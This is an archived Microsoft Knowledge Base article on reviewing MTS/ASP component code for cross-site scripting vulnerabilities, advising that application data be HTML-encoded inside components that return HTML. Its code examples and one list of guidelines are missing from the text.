Article ID: 253121 - View products that this article applies to.
This article was previously published under Q253121
This article has been archived. It is offered "as is" and will no longer be updated.
This article describes how to identify and correct Microsoft Transaction Server/Active Server Pages (ASP) applications that are susceptible to cross-site scripting security issues (CSSI). Only input that is not correctly validated or formatted makes your application vulnerable to attack.
CSSI issues are rooted in the way an application handles data validation and formatting, so it is best tackled from the presentation layer.
This layer usually will consist of ASP pages, and occasionally it may include some components that assist in the rendering of HTML for the ASP page to display.
In the latter case it is important to note that although the application should perform the same operations to protect itself from CSSI as an ASP-only application, its physical implementation will cause some of the validating/formatting code to run in the ASP pages and some in the component. For detailed information on CSSI and ASP, please see the following Microsoft Knowledge Base article:
253119The following steps will help you identify and correct ASP applications susceptible to CSSI:
(http://support.microsoft.com/kb/253119/ )How to review ASP code for CSSI vulnerability
Guidelines for formattingThese guidelines will help you identify where to tackle formatting appropriately.
When writing information to a page, the specific application data must be HTMLEncoded. It is important not to HTMLEncode tags that are intended to end up in the HTML page. Therefore, if your component functions return HTML, the HTMLEncode has to be done inside them.
To HTMLEncode a string from a component, you need a reference to the ASP server object. You can obtain this reference from the MTS ObjectContext.Items collection:
Example: This code will generate table rows with values taken from a recordset. This code does not encode the output:
When this code is fixed, note that the values themselves are HTMLEncoded, rather than the whole HTML string:
Note the use of the intermediate oServer object reference. This is included to take advantage of early binding and to avoid resolving the ObjectContext.Item lookup every time. To declare an object as ASPTypeLibrary.Server, you must include a reference to "Microsoft Active Server Pages Object Library."
Please take into account the following guidelines:
For more information, see the following advisory from the Computer Emergency Response Team (CERT) at Carnegie Mellon University:
http://www.cert.org/advisories/CA-2000-02.htmlFor more information, click the following article numbers to view the articles in the Microsoft Knowledge Base:
(http://support.microsoft.com/kb/252985/ )How to prevent cross-site scripting security issues for Web applications
(http://support.microsoft.com/kb/253120/ )How to review Visual InterDev generated code for CSSI vulnerability
(http://support.microsoft.com/kb/253117/ )How to prevent Internet Explorer and Outlook Express CSSI vulnerability
Article ID: 253121 - Last Review: October 20, 2013 - Revision: 2.0